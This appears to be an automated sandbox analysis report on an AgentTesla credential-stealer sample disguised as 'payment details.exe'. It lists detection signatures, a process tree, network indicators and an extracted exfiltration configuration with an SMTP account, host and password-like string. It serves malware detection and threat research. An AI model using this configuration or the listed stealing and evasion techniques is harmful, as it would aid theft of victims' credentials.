Loading ...

Play interactive tourEdit tour

Analysis Report payment details.exe

Overview

General Information

Sample Name:payment details.exe
Analysis ID:383908
MD5:55191839573ac8fd25655b3561286bc1
SHA1:b9e85e2ab05e4b027a3f522fd690b097aa4a4aad
SHA256:e81d917830f3fabca0557b899267ebe84ecc6fcbb5e1cd649284d1370d8a8876
Tags:AgentTesla
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • payment details.exe (PID: 7008 cmdline: 'C:\Users\user\Desktop\payment details.exe' MD5: 55191839573AC8FD25655B3561286BC1)
  • kprUEGC.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 55191839573AC8FD25655B3561286BC1)
    • kprUEGC.exe (PID: 6932 cmdline: {path} MD5: 55191839573AC8FD25655B3561286BC1)
  • kprUEGC.exe (PID: 7132 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 55191839573AC8FD25655B3561286BC1)
    • kprUEGC.exe (PID: 816 cmdline: {path} MD5: 55191839573AC8FD25655B3561286BC1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "ho@almasroor.com042264528mail.almasroor.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.payment details.exe.3e052e8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              15.2.kprUEGC.exe.39952e8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.payment details.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  16.2.kprUEGC.exe.3db52e8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.payment details.exe.3e052e8.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 4 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.payment details.exe.3e052e8.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ho@almasroor.com042264528mail.almasroor.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeReversingLabs: Detection: 33%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: payment details.exeVirustotal: Detection: 31%Perma Link
                      Source: payment details.exeReversingLabs: Detection: 33%
                      Source: 5.2.payment details.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.2.kprUEGC.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 19.2.kprUEGC.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: payment details.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: payment details.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49764 -> 69.65.3.206:587
                      Source: global trafficTCP traffic: 192.168.2.4:49764 -> 69.65.3.206:587
                      Source: Joe Sandbox ViewASN Name: ASN-GIGENETUS ASN-GIGENETUS
                      Source: global trafficTCP traffic: 192.168.2.4:49764 -> 69.65.3.206:587
                      Source: unknownDNS traffic detected: queries for: mail.almasroor.com
                      Source: payment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: payment details.exe, 00000005.00000002.923488347.0000000002D15000.00000004.00000001.sdmpString found in binary or memory: http://almasroor.com
                      Source: kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpString found in binary or memory: http://bQxorv.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: payment details.exe, 00000005.00000002.923488347.0000000002D15000.00000004.00000001.sdmpString found in binary or memory: http://mail.almasroor.com
                      Source: payment details.exe, 00000005.00000002.923358633.0000000002CD9000.00000004.00000001.sdmpString found in binary or memory: http://uDoQcdZGpyqzP0ZwyV.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: payment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: kprUEGC.exe, payment details.exeString found in binary or memory: https://github.com/michel-pi/EasyBot.Net
                      Source: payment details.exe, 00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmp, payment details.exe, 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.795750062.00000000037E9000.00000004.00000001.sdmp, kprUEGC.exe, 00000010.00000002.816268269.0000000003C09000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.817039638.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: payment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\user\Desktop\payment details.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\payment details.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.payment details.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE39C872Eu002d8914u002d48C3u002dBF35u002dA8B0A9168404u007d/u00311446D9Eu002dE05Fu002d4878u002dAF9Eu002d244D020F16BC.csLarge array initialization: .cctor: array initializer size 11951
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: payment details.exe
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CC2040_2_010CC204
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CE6230_2_010CE623
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_010CE6300_2_010CE630
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A20680_2_012A2068
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A00400_2_012A0040
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A57200_2_012A5720
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A59D00_2_012A59D0
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A00060_2_012A0006
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A20590_2_012A2059
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A42790_2_012A4279
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A42880_2_012A4288
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A25480_2_012A2548
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A54200_2_012A5420
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A54120_2_012A5412
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A17160_2_012A1716
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A57160_2_012A5716
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A17600_2_012A1760
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A29F80_2_012A29F8
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A59CA0_2_012A59CA
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A2A080_2_012A2A08
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A2FF80_2_012A2FF8
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 0_2_012A2FC50_2_012A2FC5
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 5_2_00E047A05_2_00E047A0
                      Source: C:\Users\user\Desktop\payment details.exeCode function: 5_2_00E047905_2_00E04790
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_00CFC20415_2_00CFC204
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_00CFE62015_2_00CFE620
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_00CFE63015_2_00CFE630
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261206815_2_02612068
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261004015_2_02610040
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261572015_2_02615720
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_026159D015_2_026159D0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261428215_2_02614282
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261428515_2_02614285
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261428815_2_02614288
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261205915_2_02612059
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261002815_2_02610028
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261000615_2_02610006
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261176015_2_02611760
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261276015_2_02612760
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261276815_2_02612768
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261175B15_2_0261175B
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261571015_2_02615710
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261571615_2_02615716
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261571815_2_02615718
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261571C15_2_0261571C
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261542015_2_02615420
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261541215_2_02615412
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261541815_2_02615418
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_0261254815_2_02612548
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_02612A0815_2_02612A08
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_026129F815_2_026129F8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_026159CA15_2_026159CA
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_026159CC15_2_026159CC
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_02612FF815_2_02612FF8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_02612FC515_2_02612FC5
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 15_2_04DDD99015_2_04DDD990
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_0100C20416_2_0100C204
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_0100E62016_2_0100E620
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_0100E63016_2_0100E630
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8206816_2_02B82068
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8004016_2_02B80040
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B859D016_2_02B859D0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8428816_2_02B84288
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8427916_2_02B84279
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8000616_2_02B80006
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8205916_2_02B82059
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8176016_2_02B81760
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8175D16_2_02B8175D
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8542016_2_02B85420
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8541216_2_02B85412
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B8254816_2_02B82548
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B82A0816_2_02B82A08
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B829F816_2_02B829F8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B859CA16_2_02B859CA
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B82FF816_2_02B82FF8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_02B82FC516_2_02B82FC5
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D89CE016_2_06D89CE0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8B4B016_2_06D8B4B0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8C44016_2_06D8C440
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8ADB016_2_06D8ADB0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8BA7016_2_06D8BA70
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D83A3016_2_06D83A30
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D84B7816_2_06D84B78
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D87B1316_2_06D87B13
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8D30016_2_06D8D300
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D890B016_2_06D890B0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8497816_2_06D84978
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F6F016_2_06D8F6F0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F6E116_2_06D8F6E1
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F4C816_2_06D8F4C8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F4B916_2_06D8F4B9
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8B4A016_2_06D8B4A0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8C43016_2_06D8C430
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8AD5716_2_06D8AD57
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F2D216_2_06D8F2D2
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8F2E016_2_06D8F2E0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8D2E716_2_06D8D2E7
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8BA6016_2_06D8BA60
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8BA2216_2_06D8BA22
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8886816_2_06D88868
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D891C816_2_06D891C8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8A18016_2_06D8A180
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8E15016_2_06D8E150
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 16_2_06D8A17016_2_06D8A170
                      Source: payment details.exeBinary or memory string: OriginalFilename vs payment details.exe
                      Source: payment details.exe, 00000000.00000002.698248951.0000000007C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs payment details.exe
                      Source: payment details.exe, 00000000.00000002.698248951.0000000007C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameelxZSujHMHuHJxbAMwLHIgWJxBXR.exe4 vs payment details.exe
                      Source: payment details.exe, 00000000.00000002.690812300.0000000002C51000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMetroFramework.dll> vs payment details.exe
